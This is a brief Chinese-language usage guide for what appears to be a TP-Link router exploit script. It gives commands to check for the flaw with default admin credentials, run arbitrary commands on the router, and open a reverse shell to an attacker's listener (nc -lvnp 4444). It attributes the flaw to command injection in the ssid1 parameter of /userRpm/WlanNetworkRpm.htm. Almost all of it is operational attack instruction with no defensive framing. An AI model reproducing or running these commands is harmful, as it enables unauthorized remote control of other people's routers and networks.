基本漏洞检查:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
执行自定义命令:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
反弹Shell(首先设置监听器:nc -lvnp 4444):
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
重要说明:
该漏洞是由于/userRpm/WlanNetworkRpm.htm端点的ssid1参数输入清理不当导致的,允许通过特制请求进行命令注入。